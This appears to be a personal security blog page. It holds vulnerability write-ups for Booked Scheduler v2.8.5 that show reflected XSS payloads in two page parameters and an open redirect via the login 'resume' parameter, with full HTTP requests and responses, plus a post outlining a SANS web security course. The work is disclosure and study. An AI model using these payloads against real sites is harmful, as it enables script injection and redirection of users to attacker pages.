Friday Fun Pentest Series - 13 - Reflected XSS - booked scheduler v2.8.5

 Description

- It was found that the application suffered from Reflected XSS on several pages

Reflected XSS #1 - "resevervation.php"

// HTTP GET request

GET /Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; new_version=v%3D2.8.5%2Cfs%3D1728734988; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 12 Oct 2024 12:23:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return to the last page that you were on</a></h5>
</div>

Reflected XSS #2 - "schedule.php"

// HTTP GET request

GET /Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb; resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D; schedule_calendar_toggle=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 19 Oct 2024 09:12:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]

<h5><a href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return to the last page that you were on

Friday Fun Pentest Series - 12 - Open Redirect - booked scheduler v2.8.5

 Description

- It was found that the application suffered from Open Redirect on the login page via the "resume" parameter

Open Redirect

Steps to Reproduce:

1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP
2. In the "resume" parameter add the redirect URL e.g. Burp Collab
3. Forward the request

// HTTP POST login request

POST /Bookedbo8effotfu/Web/index.php HTTP/1.1

Host: localhost

Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0

[...]

email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg

// HTTP response

HTTP/1.1 302 Found

Date: Sat, 12 Oct 2024 12:09:33 GMT

Server: Apache

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com

Content-Length: 0

Connection: close

Content-Type: text/html; charset=UTF-8

New Certification Study - SANS 522

Happy to announce that I have enrolled on the SANS 522 course for Web Security. Will keep updating my blog on what have been learned so far. 

Introduction

• Instructor is Jason Lam 
• The course comes with six books in PDF and hardcopy format
• I opted in for purchasing exam voucher and two practice tests
• The course gives VM so you could practice
• Also has ondemand videos for each module and topic

Book 1:

• Focuses on misconfigurations
• Architecture security
• Basics of how the web works
• SSRF
• HTTP methods

Book 2:

• Input validation
• Injection attacks and their mitigations
• CSRF and other attacks including defences
• File uploads functionality
• Unicode attacks

Book 3:

• Authentication security
• Authorization security
• SAML/Oauth security

Book 4:

• Frontend security
• AJAX security
• Webservices
• NodeJS security
• Clickjacking
• Browser security

Book 5:

• API security
• Graphql security
• Deserialization

The link for the course is here:

https://www.sans.org/cyber-security-courses/application-security-securing-web-apps-api-microservices/